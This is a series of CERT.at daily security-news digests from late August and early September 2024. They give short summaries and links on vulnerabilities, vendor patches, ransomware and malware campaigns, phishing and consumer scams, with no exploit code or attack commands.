---------------------------------------------
This blog post covers how forensic skills and tooling can be used to recover potentially sensitive data left on phones from devices such as Google’s Fitbit. The principles and techniques here also apply to similar products with similar functionality.
---------------------------------------------
https://www.pentestpartners.com/security-blog/advanced-forensic-techniques-…
∗∗∗ Beware of US Green Card lottery providers such as AmericanGC.com ∗∗∗
---------------------------------------------
For many, the USA is a dream destination for emigration. The Green Card lottery enables up to 50,000 people a year to immigrate with a Green Card. Demand for this lottery is high, and dubious and fraudulent providers such as AmericanGC.com take advantage of that.
---------------------------------------------
https://www.watchlist-internet.at/news/green-card-americangccom/
∗∗∗ US agencies are to secure Internet routing ∗∗∗
---------------------------------------------
The White House is putting pressure on agencies: they are to secure their network routes cryptographically. Only then can errors be noticed.
---------------------------------------------
https://heise.de/-9856483
∗∗∗ Mesh Wi-Fi from Plume Design: expensive snooping ∗∗∗
---------------------------------------------
Mesh networks are good against Wi-Fi dead spots. But beware: a US manufacturer uses its routers and extenders to monitor users and freely passes on confidential data. An investigation by Erik Bärwaldt (data protection, WLAN)
---------------------------------------------
https://www.golem.de/news/mesh-wlan-von-plume-design-teure-bespitzelung-240…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (buildah, gvisor-tap-vsock, nodejs:18, python-urllib3, and skopeo), Debian (firefox-esr and openssl), Fedora (apr and seamonkey), Red Hat (podman), Slackware (mozilla and seamonkey), SUSE (bubblewrap and flatpak, buildah, docker, dovecot23, ffmpeg, frr, go1.21-openssl, graphviz, java-1_8_0-openj9, kubernetes1.26, kubernetes1.27, kubernetes1.28, openssl-1_0_0, openssl-3, perl-DBI, python-aiohttp, python-Django, python-WebOb, thunderbird, tiff, ucode-intel, unbound, webkit2gtk3, and xen), and Ubuntu (drupal7 and twisted).
---------------------------------------------
https://lwn.net/Articles/988746/
∗∗∗ Android Patchday: updates close several high-risk vulnerabilities ∗∗∗
---------------------------------------------
It is now up to the phone manufacturers to pour the security-relevant bug fixes into firmware updates for their Android smartphones and distribute them to affected customers.
---------------------------------------------
https://heise.de/-9856847
∗∗∗ WordPress Plugin "Advanced Custom Fields" vulnerable to cross-site scripting ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN67963942/
∗∗∗ Progress: OpenEdge Third-Party Vulnerabilities Fixed In OpenEdge LTS Update 11.7.20 ∗∗∗
---------------------------------------------
https://community.progress.com/s/article/OpenEdge-Third-Party-Vulnerabiliti…
∗∗∗ Hitachi Energy: Multiple vulnerabilities in Hitachi Energy MicroSCADA X SYS600 product ∗∗∗
---------------------------------------------
https://publisher.hitachienergy.com/preview?DocumentID=8DBD000160&LanguageC…
∗∗∗ Zyxel security advisory for OS command injection vulnerability in APs and security router devices ∗∗∗
---------------------------------------------
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-…
∗∗∗ Zyxel security advisory for buffer overflow vulnerability in some 5G NR CPE, DSL/Ethernet CPE, fiber ONT, WiFi extender, and security router devices ∗∗∗
---------------------------------------------
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-…
∗∗∗ Mozilla: Security Vulnerabilities fixed in Firefox and Focus ∗∗∗
---------------------------------------------
https://www.mozilla.org/en-US/security/advisories/
∗∗∗ C-MOR: Multiple security vulnerabilities in the C-MOR video surveillance software (SYSS-2024-020 to -030) ∗∗∗
---------------------------------------------
https://www.syss.de/pentest-blog/mehrere-sicherheitsschwachstellen-in-video…
∗∗∗ F5: K000140908: MySQL Server vulnerability CVE-2024-21134 ∗∗∗
---------------------------------------------
https://my.f5.com/manage/s/article/K000140908
=====================
= End-of-Day report =
=====================
Timeframe: Montag 02-09-2024 18:00 − Dienstag 03-09-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ D-Link says it is not fixing four RCE flaws in DIR-846W routers ∗∗∗
---------------------------------------------
D-Link is warning that four remote code execution (RCE) flaws impacting all hardware and firmware versions of its DIR-846W router will not be fixed as the products are no longer supported. [..] The researcher published the information on August 27, 2024, but has withheld the publication of proof-of-concept (PoC) exploits for now.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/d-link-says-it-is-not-fixing…
∗∗∗ The state of sandbox evasion techniques in 2024 ∗∗∗
---------------------------------------------
This post is about sandbox evasion techniques and their usefulness in more targeted engagements.
---------------------------------------------
https://fudgedotdotdot.github.io/posts/sandbox-evasion-in-2024/sandboxes.ht…
∗∗∗ CVE-2024-37084: Spring Cloud Remote Code Execution ∗∗∗
---------------------------------------------
CVE-2024-37084 is a critical security vulnerability in Spring Cloud Skipper, specifically related to how the application processes YAML input. [..] The vulnerability affects versions 2.11.0 through 2.11.3 of Spring Cloud Skipper.
---------------------------------------------
https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/
∗∗∗ Intel Responds to SGX Hacking Research ∗∗∗
---------------------------------------------
Intel has shared some clarifications on claims made by a researcher regarding the hacking of its SGX security technology.
---------------------------------------------
https://www.securityweek.com/intel-responds-to-sgx-hacking-research/
∗∗∗ Ignore invoices and payment reminders from cvneed.com ∗∗∗
---------------------------------------------
You created a CV on cvneed.com? You assumed it was free? But suddenly invoices and even payment reminders are arriving? Ignore them and pay nothing. This is a subscription trap!
---------------------------------------------
https://www.watchlist-internet.at/news/mahnungen-von-cvneed/
∗∗∗ CISA Adds Three Known Exploited Vulnerabilities to Catalog ∗∗∗
---------------------------------------------
CVE-2021-20123/CVE-2021-20124 Draytek VigorConnect Path Traversal Vulnerability,
CVE-2024-7262 Kingsoft WPS Office Path Traversal Vulnerability
---------------------------------------------
https://www.cisa.gov/news-events/alerts/2024/09/03/cisa-adds-three-known-ex…
∗∗∗ Threat actors using MacroPack to deploy Brute Ratel, Havoc and PhantomCore payloads ∗∗∗
---------------------------------------------
Cisco Talos recently discovered several related Microsoft Office documents uploaded to VirusTotal by various actors between May and July 2024 that were all generated by a version of a payload generator framework called “MacroPack.”
---------------------------------------------
https://blog.talosintelligence.com/threat-actors-using-macropack/
∗∗∗ A look into Web Application Security ∗∗∗
---------------------------------------------
An in-depth look into Web Application Security, and Bitsights approach to related security metrics.
---------------------------------------------
https://www.bitsight.com/blog/look-web-application-security
=====================
= Vulnerabilities =
=====================
∗∗∗ Zyxel: Multiple high-risk security vulnerabilities in firewalls ∗∗∗
---------------------------------------------
Zyxel is warning of several security vulnerabilities in the company's firewalls. Updates that close the holes are available. [..] The most serious is a flaw that allows attackers to inject commands into the IPSec VPN of Zyxel firewalls. Using manipulated usernames, they can smuggle in commands that are then executed by the operating system.
---------------------------------------------
https://heise.de/-9855938
∗∗∗ VMSA-2024-0018: VMware Fusion update addresses a code execution vulnerability (CVE-2024-38811) ∗∗∗
---------------------------------------------
VMware Fusion contains a code-execution vulnerability due to the usage of an insecure environment variable. VMware has evaluated the severity of this issue to be in the Important severity range with a maximum CVSSv3 base score of 8.8.
---------------------------------------------
https://support.broadcom.com/web/ecx/support-content-notification/-/extern…
∗∗∗ OpenSSL Security Advisory [3rd September 2024] ∗∗∗
---------------------------------------------
Possible denial of service in X.509 name checks (CVE-2024-6119) [..] OpenSSL 3.3, 3.2, 3.1 and 3.0 are vulnerable to this issue.
---------------------------------------------
https://openssl-library.org/news/secadv/20240903.txt
∗∗∗ Security updates for Tuesday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (python3.12), Debian (calibre, exfatprogs, frr, git, libtommath, nbconvert, ruby-nokogiri, ruby-tzinfo, and webkit2gtk), Fedora (flatpak, lua-mpack, and python3.12), Red Hat (389-ds-base, 389-ds:1.4, buildah, fence-agents, gvisor-tap-vsock, httpd:2.4, kernel, kernel-rt, nodejs:18, orc, postgresql, postgresql:12, postgresql:13, postgresql:15, python-urllib3, python3.12, and skopeo), SUSE (389-ds, bubblewrap and flatpak, cacti, cacti-spine, curl, glib2, kernel-firmware, libqt5-qt3d, libqt5-qtquick3d, opera, python39, qemu, unbound, xen, and zziplib), and Ubuntu (ffmpeg, linux-raspi-5.4, and python-webob).
---------------------------------------------
https://lwn.net/Articles/988570/
∗∗∗ Chrome 128 Updates Patch High-Severity Vulnerabilities ∗∗∗
---------------------------------------------
https://www.securityweek.com/chrome-128-updates-patch-high-severity-vulnera…
∗∗∗ Lenze: Install Directory with insufficient permissions ∗∗∗
---------------------------------------------
https://certvde.com/de/advisories/VDE-2024-053/
∗∗∗ LOYTEC Electronics LINX Series ∗∗∗
---------------------------------------------
https://www.cisa.gov/news-events/ics-advisories/icsa-24-247-01
=====================
= End-of-Day report =
=====================
Timeframe: Freitag 30-08-2024 18:00 − Montag 02-09-2024 18:00
Handler: Michael Schlagenhaufer
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Administrative IT infiltrated: Cyberattack hits Deutsche Flugsicherung ∗∗∗
---------------------------------------------
According to a company spokesperson, the incident affects the office IT of DFS. The attack apparently has no impact on air traffic. [..] Who exactly is behind the cyberattack on Deutsche Flugsicherung cannot yet be answered with certainty. [..] The company is currently working to contain the incident and minimize its impact.
---------------------------------------------
https://www.golem.de/news/administrative-it-infiltriert-cyberangriff-trifft…
∗∗∗ TSA airport security checks bypassed via SQL injection ∗∗∗
---------------------------------------------
Security researchers in the USA have succeeded in deceiving the FlyCASS security system via SQL injection and thereby bypassing access controls.
---------------------------------------------
https://heise.de/-9853305
∗∗∗ Windows: DLL side-loading attacks via licensingdiag.exe ∗∗∗
---------------------------------------------
Anyone concerned with Windows security should keep an eye on the command-line tool licensingdiag.exe. It is another "living off the land" binary that can be used for DLL side-loading attacks.
---------------------------------------------
https://www.borncity.com/blog/2024/09/01/windows-side-loading-dll-angriffe-…
∗∗∗ Spoofed GlobalProtect Used to Deliver Unique WikiLoader Variant ∗∗∗
---------------------------------------------
Unit 42 discusses WikiLoader malware spoofing GlobalProtect VPN, detailing evasion techniques, malicious URLs, and mitigation strategies.
---------------------------------------------
https://unit42.paloaltonetworks.com/global-protect-vpn-spoof-distributes-wi…
∗∗∗ GitHub comments abused to push password stealing malware masked as fixes ∗∗∗
---------------------------------------------
GitHub is being abused to distribute the Lumma Stealer information-stealing malware as fake fixes posted in project comments. [..] The solution tells people to download a password-protected archive from mediafire.com or through a bit.ly URL and run the executable within it. In the current campaign, the password has been "changeme" in all the comments we have seen.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/github-comments-abused-to-pu…
∗∗∗ Docker-OSX image used for security research hit by Apple DMCA takedown ∗∗∗
---------------------------------------------
The popular Docker-OSX project has been removed from Docker Hub after Apple filed a DMCA (Digital Millennium Copyright Act) takedown request, alleging that it violated its copyright.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/docker-osx-image-used-for-se…
∗∗∗ Cicada3301 ransomware’s Linux encryptor targets VMware ESXi systems ∗∗∗
---------------------------------------------
A new ransomware-as-a-service (RaaS) operation named Cicada3301 has already listed 19 victims on its extortion portal, as it quickly attacked companies worldwide. [..] An analysis of the new malware by Truesec revealed significant overlaps between Cicada3301 and ALPHV/BlackCat, indicating a possible rebrand or a fork created by former ALPHV core team members. [..] For context, ALPHV performed an exit scam in early March 2024 involving fake claims about an FBI takedown operation after they stole a massive $22 million payment from Change Healthcare from one of their affiliates.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/cicada3301-ransomwares-linux…
∗∗∗ Handed over a copy of your ID and personal data to criminals? Here is what you can do ∗∗∗
---------------------------------------------
You fell victim to a scam and transmitted personal data or even copies of your ID in the process? We show you what you can do when criminals have obtained your data by fraud!
---------------------------------------------
https://www.watchlist-internet.at/news/ausweiskopie-und-persoenliche-daten-…
∗∗∗ "Voldemort" malware: Attackers increasingly target taxpayers ∗∗∗
---------------------------------------------
A new wave of attacks is increasingly targeting tax authorities, but also other government agencies and companies in various countries, including here at home. The "Voldemort" malware is distributed via phishing emails. Whoever clicks may end up installing a backdoor. [..] More than half of the affected organizations come from the insurance, aerospace, transport and education sectors.
---------------------------------------------
https://heise.de/-9854106
=====================
= Vulnerabilities =
=====================
∗∗∗ Fortra fixed two severe issues in FileCatalyst Workflow, including a critical flaw ∗∗∗
---------------------------------------------
Cybersecurity and automation company Fortra released patches for two vulnerabilities in FileCatalyst Workflow. One of the vulnerabilities is a critical issue, tracked as CVE-2024-6633 (CVSS score of 9.8), described as an Insecure Default in FileCatalyst Workflow Setup.
---------------------------------------------
https://securityaffairs.com/167838/security/fortra-filecatalyst-critical-wo…
∗∗∗ Security updates for Monday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (postgresql:16), Debian (dovecot, pymatgen, ruby2.7, systemd, and webkit2gtk), Fedora (microcode_ctl, python3.11, vim, and xen), Oracle (kernel, postgresql:12, postgresql:13, postgresql:15, and python39:3.9 and python39-devel:3.9), Slackware (libpcap), SUSE (cacti, cacti-spine, python-Django, and trivy), and Ubuntu (dovecot).
---------------------------------------------
https://lwn.net/Articles/988364/
∗∗∗ WordPress Vulnerability & Patch Roundup August 2024 ∗∗∗
---------------------------------------------
https://blog.sucuri.net/2024/08/wordpress-vulnerability-patch-roundup-augus…
∗∗∗ MISP 2.4.197 released with many bugs fixed, a security fix and improvements. ∗∗∗
---------------------------------------------
https://github.com/MISP/MISP/releases/tag/v2.4.197
=====================
= End-of-Day report =
=====================
Timeframe: Donnerstag 29-08-2024 18:00 − Freitag 30-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Fake Palo Alto GlobalProtect used as lure to backdoor enterprises ∗∗∗
---------------------------------------------
Threat actors target Middle Eastern organizations with malware disguised as the legitimate Palo Alto GlobalProtect Tool that can steal data and execute remote PowerShell commands to infiltrate internal networks further.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fake-palo-alto-globalprotect…
∗∗∗ FBI: RansomHub ransomware breached 210 victims since February ∗∗∗
---------------------------------------------
Since surfacing in February 2024, RansomHub ransomware affiliates have breached over 200 victims from a wide range of critical U.S. infrastructure sectors.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/fbi-ransomhub-ransomware-bre…
∗∗∗ Russian hackers exploit the same vulnerabilities as government spyware ∗∗∗
---------------------------------------------
Experts repeatedly warn that criminals can also exploit the very loopholes through which governments surveil suspects.
---------------------------------------------
https://futurezone.at/netzpolitik/russische-hacker-staatstrojaner-messenger…
∗∗∗ Study: 78 percent of all ransomware victims apparently pay a ransom ∗∗∗
---------------------------------------------
Many affected companies apparently even pay several times. Four or more ransom payments are not uncommon either, especially in Germany.
---------------------------------------------
https://www.golem.de/news/studie-78-prozent-aller-ransomware-opfer-zahlen-o…
∗∗∗ Feds claim sinister sysadmin locked up thousands of Windows workstations, demanded ransom ∗∗∗
---------------------------------------------
Sordid search history evidence in case that could see him spend 35 years for extortion and wire fraud.
A former infrastructure engineer who allegedly locked IT department colleagues out of their employer's systems, then threatened to shut down servers unless paid a ransom, has been arrested and charged after an FBI investigation.
---------------------------------------------
https://www.theregister.com/2024/08/29/vm_engineer_extortion_allegations/
∗∗∗ How to enhance the security of your social media accounts ∗∗∗
---------------------------------------------
TL;DR Strong passwords: Use a password manager. Multi-factor authentication (MFA): MFA requires multiple forms of identification, adding an extra layer of security. This makes it harder for unauthorised users to ..
---------------------------------------------
https://www.pentestpartners.com/security-blog/how-to-enhance-the-security-o…
∗∗∗ TLD Tracker: Exploring Newly Released Top-Level Domains ∗∗∗
---------------------------------------------
Unit 42 researchers use a novel graph-based pipeline to detect misuse of 19 new TLDs for phishing, chatbots and more in several case studies.
---------------------------------------------
https://unit42.paloaltonetworks.com/tracking-newly-released-top-level-domai…
∗∗∗ Malicious North Korean packages appear again in open source code repository ∗∗∗
---------------------------------------------
North Korean hackers continue to exploit the widely used npm code repository, publishing malicious packages intended to infect software developers’ devices with malware, according to recent research.
---------------------------------------------
https://therecord.media/npm-javascript-repository-north-korean-malware
∗∗∗ TR-88 - Motivation, procedure and rational for leaked credential notifications ∗∗∗
---------------------------------------------
In today’s digital landscape, protecting user data is essential for every organization. When public data leaks expose customer credentials, it is critical to respond promptly to mitigate risks. This document outlines why CIRCL ..
---------------------------------------------
https://www.circl.lu/pub/tr-88
∗∗∗ Silent Intrusions: Godzilla Fileless Backdoors Targeting Atlassian Confluence ∗∗∗
---------------------------------------------
Trend Micro discovered that old Atlassian Confluence versions that were affected by CVE-2023-22527 are being exploited using a new in-memory fileless backdoor.
---------------------------------------------
https://www.trendmicro.com/en_us/research/24/h/godzilla-fileless-backdoors.…
∗∗∗ Gaps in Skills, Knowledge, and Technology Pave the Way for Breaches ∗∗∗
---------------------------------------------
The stakes continue growing higher for organizations when it comes to cybersecurity incidents, with the fallout of such incidents becoming more costly and complex. According to the Fortinet 2024 Cybersecurity Skills Gap Report, the overwhelming majority (87%) of those surveyed said they experienced one or ..
---------------------------------------------
https://www.fortinet.com/blog/industry-trends/gaps-in-skills-knowledge-tech…
∗∗∗ Ransomware Roundup - Underground ∗∗∗
---------------------------------------------
The Underground ransomware has victimized companies in various industries since July 2023. It encrypts files without changing the original file extension.
---------------------------------------------
https://www.fortinet.com/blog/threat-research/ransomware-roundup-underground
∗∗∗ After cyberattack: Solar provider "Qcells" informs customers about data leak ∗∗∗
---------------------------------------------
Once again there is a data leak in the solar industry. Qcells customers are therefore being informed.
---------------------------------------------
https://heise.de/-9852641
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Friday ∗∗∗
---------------------------------------------
Security updates have been issued by AlmaLinux (libvpx, postgresql, postgresql:12, postgresql:13, postgresql:15, and python39:3.9 and python39-devel:3.9), Debian (chromium and ghostscript), Fedora (python3.13), and SUSE (chromium and podman).
---------------------------------------------
https://lwn.net/Articles/987836/
∗∗∗ DSA-5761-1 chromium - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00174.html
∗∗∗ IPCOM vulnerable to information disclosure ∗∗∗
---------------------------------------------
https://jvn.jp/en/jp/JVN29238389/
=====================
= End-of-Day report =
=====================
Timeframe: Mittwoch 28-08-2024 18:00 − Donnerstag 29-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Unpatchable 0-day in surveillance cam is being exploited to install Mirai ∗∗∗
---------------------------------------------
Vulnerability is easy to exploit and allows attackers to remotely execute commands.
---------------------------------------------
https://arstechnica.com/?p=2046043
∗∗∗ Iranian hackers work with ransomware gangs to extort breached orgs ∗∗∗
---------------------------------------------
An Iran-based hacking group known as Pioneer Kitten is breaching defense, education, finance, and healthcare organizations across the United States and working with affiliates of several ransomware operations to extort the victims.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/iranian-hackers-work-with-ra…
∗∗∗ Finally: Measure against calls with spoofed numbers comes into force ∗∗∗
---------------------------------------------
From September 1, it should no longer be possible for one's own mobile number to be used for spam calls.
---------------------------------------------
https://futurezone.at/netzpolitik/rtr-veordnung-massnahme-nummer-gefaelscht…
∗∗∗ Peach Sandstorm deploys new custom Tickler malware in long-running intelligence gathering operations ∗∗∗
---------------------------------------------
Between April and July 2024, Microsoft observed Iranian state-sponsored threat actor Peach Sandstorm deploying a new custom multi-stage backdoor, which we named Tickler. Tickler has been used in attacks against targets in the satellite, communications equipment, oil and gas, as well as federal and state government sectors in the United States and the ..
---------------------------------------------
https://www.microsoft.com/en-us/security/blog/2024/08/28/peach-sandstorm-de…
∗∗∗ Cybercrime and Sabotage Cost German Firms $300 Billion In Past Year ∗∗∗
---------------------------------------------
According to a new survey from Bitkom, cybercrime and other acts of sabotage have cost German companies around $298 billion in the past year, up 29% on the year before. Reuters reports: Bitkom surveyed around 1,000 companies from all sectors and found that 90% expect more cyberattacks in the next 12 months, with the remaining 10% expecting the same level of ..
---------------------------------------------
https://it.slashdot.org/story/24/08/28/211228/cybercrime-and-sabotage-cost-…
∗∗∗ 12 Best Practices to Secure Your WordPress Login Page ∗∗∗
---------------------------------------------
WordPress powers a significant portion of websites on the internet. With this popularity comes the need for strict security measures, especially for the login page. These entry points are prime targets for hackers and malicious actors. By implementing proper security practices outlined in this guide, you can maintain a secure WordPress login and ..
---------------------------------------------
https://blog.sucuri.net/2024/08/12-best-practices-to-secure-your-wordpress-…
∗∗∗ Microsoft hosts a security summit but no press, public allowed ∗∗∗
---------------------------------------------
CrowdStrike, other vendors, friendly govt reps .. but not anyone who would tell you what happened.
Op-ed: Microsoft will host a security summit next month with CrowdStrike and other "key" endpoint security partners joining the fun - and during which the CrowdStrike-induced outage that borked millions of Windows machines will undoubtedly be a top-line agenda item.
---------------------------------------------
https://www.theregister.com/2024/08/28/microsoft_closed_security_summit/
∗∗∗ Censys Finds Hundreds of Exposed Servers as Volt Typhoon APT Targets Service Providers ∗∗∗
---------------------------------------------
Amidst Volt Typhoon zero-day exploitation, Censys finds hundreds of exposed servers presenting ripe attack surface for attackers.
---------------------------------------------
https://www.securityweek.com/censys-finds-hundreds-of-exposed-servers-as-vo…
∗∗∗ Telegram as a fraud trap ∗∗∗
---------------------------------------------
The messaging service Telegram has been on everyone's lips at the latest since the arrest of its founder Pawel Durow in Paris. At Watchlist Internet, however, Telegram has kept us busy for much longer. Hardly anywhere else do criminals succeed better at luring victims into their traps. Investment fraud, pyramid schemes and fraudulent job offers in particular sometimes cause horrendous losses. So far, there have been no consequences on Telegram for the criminals.
---------------------------------------------
https://www.watchlist-internet.at/news/telegram-als-betrugsfalle/
∗∗∗ $2.5 million reward offered for hacker linked to notorious Angler Exploit Kit ∗∗∗
---------------------------------------------
Who doesn't fancy earning US $2.5 million? That's the reward that's on offer from US authorities for information leading to the arrest and/or conviction of the man who allegedly was a key figure behind the development and distribution of the notorious Angler Exploit Kit. Read more in my article on the Tripwire State of Security blog.
---------------------------------------------
https://www.tripwire.com/state-of-security/25-million-reward-offered-cyber-…
∗∗∗ Cisco: BlackByte ransomware gang only posting 20% to 30% of successful attacks ∗∗∗
---------------------------------------------
The BlackByte ransomware gang is only posting a fraction of its successful attacks on its leak site this year, according to researchers from Cisco.
---------------------------------------------
https://therecord.media/blackbyte-ransomware-group-posting-fraction-of-leaks
∗∗∗ State-backed attackers and commercial surveillance vendors repeatedly use the same exploits ∗∗∗
---------------------------------------------
We’re sharing an update on suspected state-backed attacker APT29 and the use of exploits identical to those used by Intellexa and NSO.
---------------------------------------------
https://blog.google/threat-analysis-group/state-backed-attackers-and-commer…
∗∗∗ The Big TIBER Encyclopedia ∗∗∗
---------------------------------------------
An analysis of current TIBER implementations ahead of DORA's TLPT requirements. TIBER (Threat Intelligence-Based Ethical Red Teaming) is a framework introduced by the European Central Bank (ECB) in 2018 as a response to the increasing number of cyber threats faced by financial institutions. The framework provides a ..
---------------------------------------------
https://blog.nviso.eu/2024/08/29/the-big-tiber-encyclopedia/
∗∗∗ The vulnerabilities we uncovered by fuzzing µC/OS protocol stacks ∗∗∗
---------------------------------------------
Fuzzing has long been one of our favorite ways to search for security issues or vulnerabilities in software, but when it comes to fuzzing popular systems used in ICS environments, it traditionally involved a custom hardware setup to fuzz the code in its native environment.
---------------------------------------------
https://blog.talosintelligence.com/fuzzing-uc-os-protocol-stacks/
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Family August 2024 First Round Security Update Advisory ∗∗∗
---------------------------------------------
https://asec.ahnlab.com/en/82727/
=====================
= End-of-Day report =
=====================
Timeframe: Dienstag 27-08-2024 18:00 − Mittwoch 28-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: Michael Schlagenhaufer
=====================
= News =
=====================
∗∗∗ ISPs infiltrated: Zero-day exploited for months ∗∗∗
---------------------------------------------
A vulnerability in the Versa Director network software (CVE-2024-39717) is being exploited more widely than initially known. Attackers have established themselves at at least three Internet service providers (ISPs) in the USA and one outside the country in order to intercept customer logins and passwords in plaintext before they are hashed and stored at the ISP. [..] The attack fails if the Versa patches have been installed or if port 4566 is not reachable from customer routers. For the latter, Versa has for years recommended appropriate firewall settings and system hardening.
---------------------------------------------
https://heise.de/-9849553
∗∗∗ ADAC warns: Most keyless systems still easy to crack ∗∗∗
---------------------------------------------
The ADAC tested around 700 vehicles with keyless entry systems. More than 90 percent of them can be opened and started remotely via a relay attack.
---------------------------------------------
https://www.golem.de/news/adac-warnt-die-meisten-keyless-systeme-weiterhin-…
∗∗∗ Windows Downdate: Tool for reopening old Windows vulnerabilities published ∗∗∗
---------------------------------------------
With Windows Downdate, Windows components such as DLLs, drivers or the NT kernel can be downgraded unnoticed to vulnerable versions. The tool is now public.
---------------------------------------------
https://www.golem.de/news/windows-downdate-tool-zum-oeffnen-alter-windows-l…
∗∗∗ Fraudulent cease-and-desist letter in the name of Pornhub ∗∗∗
---------------------------------------------
"Final warning before legal action" is the subject line of a disturbing email. The law firm Frommer Legal is currently sending out emails indiscriminately, claiming that the recipient has streamed copyrighted content from Pornhub.com.
---------------------------------------------
https://www.watchlist-internet.at/news/abmahnung-pornhub/
∗∗∗ Intel's Software Guard Extensions broken? Don't panic ∗∗∗
---------------------------------------------
Today's news that Intel's Software Guard Extensions (SGX) security system is open to abuse may be overstated. [..] However, Intel has pointed out that not only would an attacker need physical access to a machine to make this work, but that string of issues would have to have been left unfixed.
---------------------------------------------
https://go.theregister.com/feed/www.theregister.com/2024/08/27/intel_root_k…
∗∗∗ New QR Code Phishing Campaign Exploits Microsoft Sway to Steal Credentials ∗∗∗
---------------------------------------------
Cybersecurity researchers are calling attention to a new QR code phishing (aka quishing) campaign that leverages Microsoft Sway infrastructure to host fake pages, once again highlighting the abuse of legitimate cloud offerings for malicious purposes.
---------------------------------------------
https://thehackernews.com/2024/08/new-qr-code-phishing-campaign-exploits.ht…
∗∗∗ New LummaC2 Malware Variant Uses PowerShell, Obfuscation to Steal Data ∗∗∗
---------------------------------------------
Ontinue has discovered a new LummaC2 malware variant with increased activity, using PowerShell for initial infection and employing obfuscation and process injection to steal sensitive data.
---------------------------------------------
https://hackread.com/lummac2-malware-variant-powershell-obfuscation-steal-d…
∗∗∗ Old devices, new dangers: The risks of unsupported IoT tech ∗∗∗
---------------------------------------------
Outdated devices can be easy targets, so by keeping them disconnected from the internet or discontinuing their use, you can feel safe and secure from any cyber harm through them.
---------------------------------------------
https://www.welivesecurity.com/en/internet-of-things/old-devices-new-danger…
∗∗∗ CVE-2024-37079: VMware vCenter Server Integer Underflow Code Execution Vulnerability ∗∗∗
---------------------------------------------
A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted DCERPC packet to the target server. Successfully exploiting this vulnerability could lead to a heap buffer overflow, which could result in the execution of arbitrary code in the context of the vulnerable service. [..] This vulnerability was patched by the vendor in June. At the time of the patch release, there was a fair amount of attention paid to this vulnerability. However, to date, there have been no attacks detected in the wild.
---------------------------------------------
https://www.thezdi.com/blog/2024/8/27/cve-2024-37079-vmware-vcenter-server-…
∗∗∗ BlackByte blends tried-and-true tradecraft with newly disclosed vulnerabilities to support ongoing attacks ∗∗∗
---------------------------------------------
In recent investigations, Talos Incident Response has observed the BlackByte ransomware group using techniques that depart from their established tradecraft.
---------------------------------------------
https://blog.talosintelligence.com/blackbyte-blends-tried-and-true-tradecra…
∗∗∗ Deep Analysis of Snake Keylogger’s New Variant ∗∗∗
---------------------------------------------
We performed a deep analysis on the campaign and discovered that it delivers a new variant of Snake Keylogger.
---------------------------------------------
https://feeds.fortinet.com/~/903638177/0/fortinet/blogs~Deep-Analysis-of-Sn…
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Wednesday ∗∗∗
---------------------------------------------
Security updates have been issued by Fedora (calibre, dotnet8.0, dovecot, webkit2gtk4.0, and webkitgtk), Oracle (nodejs:20), Red Hat (bind, bind and bind-dyndb-ldap, postgresql:16, and squid), Slackware (kcron and plasma), SUSE (keepalived and webkit2gtk3), and Ubuntu (drupal7).
---------------------------------------------
https://lwn.net/Articles/987519/
∗∗∗ DSA-5759-1 python3.11 - security update ∗∗∗
---------------------------------------------
https://lists.debian.org/debian-security-announce/2024/msg00172.html
--
CERT.at Daily mailing list
Listinfo: https://lists.cert.at/cgi-bin/mailman/listinfo/daily
=====================
= End-of-Day report =
=====================
Timeframe: Monday 26-08-2024 18:00 − Tuesday 27-08-2024 18:00
Handler: Alexander Riepl
Co-Handler: n/a
=====================
= News =
=====================
∗∗∗ Hackers infect ISPs with malware that steals customers’ credentials ∗∗∗
---------------------------------------------
A zero-day that had been exploited since June to infect ISPs finally gets fixed.
---------------------------------------------
https://arstechnica.com/?p=2045401
∗∗∗ Google tags a tenth Chrome zero-day as exploited this year ∗∗∗
---------------------------------------------
Today, Google revealed that it patched the tenth zero-day exploited in the wild in 2024 by attackers or security researchers during hacking contests.
---------------------------------------------
https://www.bleepingcomputer.com/news/security/google-tags-a-tenth-chrome-z…
∗∗∗ Exposed and Encrypted: Inside a Mallox Ransomware Attack ∗∗∗
---------------------------------------------
Recently, a client enlisted the support of Trustwave to investigate an unauthorized access incident within its internal cloud-based environment, leading to the deployment of Mallox ransomware by threat actors to its server.
---------------------------------------------
https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/exposed-and…
∗∗∗ Microsoft mistake blows up admins' inboxes with fake malware alerts ∗∗∗
---------------------------------------------
Legitimate emails misclassified in software snafu. Many administrators have had a trying Monday after getting spammed out with false malware reports by Microsoft.
---------------------------------------------
https://www.theregister.com/2024/08/26/microsoft_365_email_malware/
∗∗∗ ThreatLabz Discovers 117 Vulnerabilities in Microsoft 365 Apps Via the SketchUp 3D Library - Part 2 ∗∗∗
---------------------------------------------
In Part 1 of this series, we’ve demonstrated how ThreatLabz reverse engineered the SketchUp 3D library in Microsoft 365 as well as the SKP file format. Furthermore, we developed two effective fuzzing harnesses. Microsoft published CVE-2023-28285 and CVE-2023-29344 (in April and May of 2023, respectively) to address the vulnerabilities ..
---------------------------------------------
https://www.zscaler.com/blogs/security-research/threatlabz-discovers-117-vu…
